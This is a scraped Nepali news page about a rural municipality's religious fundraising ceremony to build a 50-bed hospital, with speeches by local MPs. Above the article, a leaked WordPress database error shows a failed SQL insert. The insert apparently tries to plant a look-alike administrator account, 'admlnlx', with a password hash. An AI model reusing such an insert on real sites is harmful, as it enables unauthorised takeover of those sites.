WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6xPez7nN6u1yleqFuPlH5QOna4Agx0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 22:06:12', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशी गाउँपालिकाको अर्को उद्घोषः ५० शैय्याको अस्पताल निर्माणार्थ महायज्ञ – Gaule Khabar

थुलुङ दुधकोशी गाउँपालिकाको अर्को उद्घोषः ५० शैय्याको अस्पताल निर्माणार्थ महायज्ञ

थुलुङ दुधकोशी गाउँपालिकाको अर्को उद्घोषः ५० शैय्याको अस्पताल निर्माणार्थ महायज्ञ

काठमाडौं, थुलुङ दुधकोशी गाउँपालिकामा ५० शैय्याको अत्याधुनिक सुविधासम्पन्न अस्पताल निर्माणका लागि २०७५ साल चैत्र २ गतेदेखि ९ गतेसम्म बृहत महायज्ञ आयोजना गर्ने औपचारिक घोषणा गरिएको छ । मंगलबार काठमाडौं धुम्बराहीमा अवस्थित स्मार्ट क्याफेमा आयोजित एक विशेष भेलाले गाउँपालिका अध्यक्ष असिम राईको अध्यक्षतामा ५ हजार एक सदस्यीय महायज्ञ मुल आयोजक समारोह समिति गठन गरेको छ ।

मुल आयोजक समारोह समितिको महासचिवमा उद्योगी विमल बस्नेत महासचिव र सफल उद्योगी तथा समाजसेवी बलराम गुरुङ कोषाध्यक्ष रहनुभएको छ भने उपाध्यक्ष, सचिव, सदस्य चयन तथा विभागीय जिम्मेवारी वाँडफाँडको जिम्मेवारी अध्यक्ष, महासचिव र कोषाध्यक्षलाई दिइएको छ ।

गाउँपालिकाले एकीकृत नमुना बस्ती निर्माण, आधुनिक कृषि प्रणालीका लागि ५ ‘क’, जातीय छुवाछुत मुक्त क्षेत्र, यस क्षेत्रको शिक्षा, स्वास्थ्य तथा सडकलगायतको विकासका लागि आकर्षक परियोजना तथा कार्यक्रमहरु सार्वजनिक गरेर तीब्र गतिमा काम अघि बढाइरहेको छ ।

गाउँपालिकाका अध्यक्ष तथा महायज्ञ मुल आयोजक समारोह समितिका नवनिर्वाचित अध्यक्ष असिम राईले कुनै प्रकारको दुर्घटना तथा विरामी हुँदा महंगो रकम खर्चेर हेलिकोप्टर चार्टर गर्नुपर्ने जनताको बाध्यतालाई ध्यानमा राखेर भ्यान्टिलेटरसहितको अस्पताल निर्माण अभियान अघि बढाइएको बताउनुभयो ।

धार्मिक तथा सामाजिक सद्भाव अभिबृद्धिको अतिरिक्त अस्पताल निर्माणार्थ महायज्ञबाट २० करोड रकम संकलन गर्ने लक्ष्य राखिएको अध्यक्ष राईले बताउनुभयो । उहाँकाअनुसार सोलुखुम्बु, खोटाङ र ओखल्ढुंगा जिल्लाका जनतालाई सेवा दिनेगरी गाउँपालिकाको केन्द्र मुक्लिमा सो अस्पताल निर्माण गरिनेछ । गाउँपालिकाले अत्याधुनिक सुविधासहितको अस्पताल स्थापना गरेर नमुना स्वास्थ्य ग्रामकै रुपमा विकास गर्ने दाबी उहाँको छ ।

कार्यक्रमलाई सम्बोधन गर्दै प्रतिनिधि सभा सदस्य हेमकुमार राई (सुरबीर)ले थुलुङ दुधकोशी गाउँपालिकामा चरणबद्ध नयाँ नयाँ कार्यक्रमहरु अगाडि बढाउने क्रममा अस्पताल स्थापना गर्ने महान उद्देश्यका साथ महायज्ञ आयोजना गर्नु सबैका लागि प्रेरणादायी कार्य भएको बताउनुभयो । यस अभियानमार्फत जिल्लाको सम्बृद्धि र विकासमा इटा थप्ने विश्वास व्यक्त गर्दै सांसद राईले आफ्नो ठाउँबाट पूरा गर्नुपर्ने दायित्व र जिम्मेवारी बहन गर्ने प्रतिबद्धतासमेत जनाउनुभयो ।

सम्बृद्धि नेपाल र सुखी नेपाली भन्ने सरकारको नारालाई व्यवहारमा देखाउने माध्यमको रुपमा गाउँपालिकाले यो महायज्ञ कार्यक्रम अघि बढाएको चर्चा गर्दै उहाँले समग्र जिल्लाको विकासमा यसबाट कोशेढुंगा सावित हुने विचार राख्नुभयो । एक अर्को प्रसंगमा सांसद राईले सरकारको हरेक कामको बारेमा अनावश्यक र विनातुकका भ्रमहरु छर्ने प्रयास भइरहेको भन्दै संघीयतालाई संस्थागत गरेर फुलफेजमा काम हुन थालेकाले अब सम्बृद्धिको ढोका खुलेको दाबी गर्नुभयो ।

वाचन प्रविण पण्डित दिनबन्धु पोख्रलले महायज्ञ दान संकलन गर्ने र एउटा सामान्य कर्मविधि तथा कर्मकाण्डको रुपमा मात्रै नलिन आग्रह गर्दै महायज्ञले अघि बढाउने आध्यात्म .र विज्ञानको समायोजनबाट जिल्लाको समग्र विकासलाई मार्गनिर्देश हुने विश्वाससमेत व्यक्त गर्नुभयो । यस महायज्ञले व्यक्तिलाई भौतिकतावादी र अत्यात्मिकतावादी बीचको मध्यमार्गी बन्न प्रेरित गर्ने, विज्ञान र धर्मका बारेमा विस्तृत जानकार बनाउने, जातीय अस्तित्व र सद्भाव कायम गरेर समतामूलक समाज निर्माणको बाटो देखाउने, हरेक काममा राज्यकै मुख ताक्ने मात्रै नभएर सबैले आआफ्नो दायित्व बहन गर्नेलगायातका विषयमा सकारात्मक सन्देश प्रवाह गर्ने भनाइ उहाँको थियो ।

प्रदेश नम्बर १ का सांसद बुद्धिकुमार राजभण्डारीले सोलुखुम्बुको विकास निर्माण तीब्र गतिमा अघि बढिरहेको उल्लेख गर्दै महायज्ञको माध्यमबाट अर्को ठूलो अभियान सुरुवात भएको उल्लेख गर्नुभयो । यस अभियानमार्फत जिल्लाको स्वास्थ्य क्षेत्रमा महत्वपूर्ण योग्दान पुग्ने विश्वाससमेत उहाँले व्यक्त गर्नुभयो ।

प्रदेश नम्बर १ का अर्का सांसद उत्तमकुमार भण्डारीले जनताको सेवा र सुविधालाई ध्यानमा राखेर अस्पताल निर्माणार्थ महायज्ञ आयोजना गर्न लागिएको भन्दै यसले त्यस क्षेत्रको विकासमा फड्को मार्न मद्दत मिल्ने बताउनुभयो । अस्पतालको लागि आवश्यक सम्पूर्ण विषयमा अध्ययन भइसकेको उल्लेख गर्दै सांसद बस्नेतले कुनैपनि हालतमा अस्पताल बनाएरै छाड्ने दाबी गर्नुभयो ।

नेपाल कम्युनिष्ट पार्टीका केन्द्रीय सदस्य राजेन्द्र बस्नेतले पवित्र उद्देश्य लिएर आयोजना गर्न लागिएको महायज्ञ सफल पार्नका लागि सबैले आआफ्नो ठाउँबाट साथ, सहयोग र सहकार्य गर्नुपर्नेमा जोड दिनुभयो । हरेक समुदायबीचको भावनात्मक एकता मजबुद पार्न महायज्ञले टेवा पुर्‍याउने उहाँको भनाइ थियो ।

पूर्व माननीय भूपाल किरातीले गाउँपालिकाले अनुकुल समयमा यो महत्वपूर्ण निर्णय गरेको भन्दै यसको लागि कुनै कन्जुसाई नगरीकन र त्यो पार्टी, यो पार्टी नभनिकन सहयोग गर्नुपर्ने बताउनुभयो ।

नेपाल सरकारका सहसचिव डा. योगेन्द्रकुमार कार्कीले पवित्रधार्मिक तथा सामाजिक कार्यमा सहयोग गर्ने ऐक्वबद्धता प्रकट गर्नुभयो ।

source:shikharpost

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका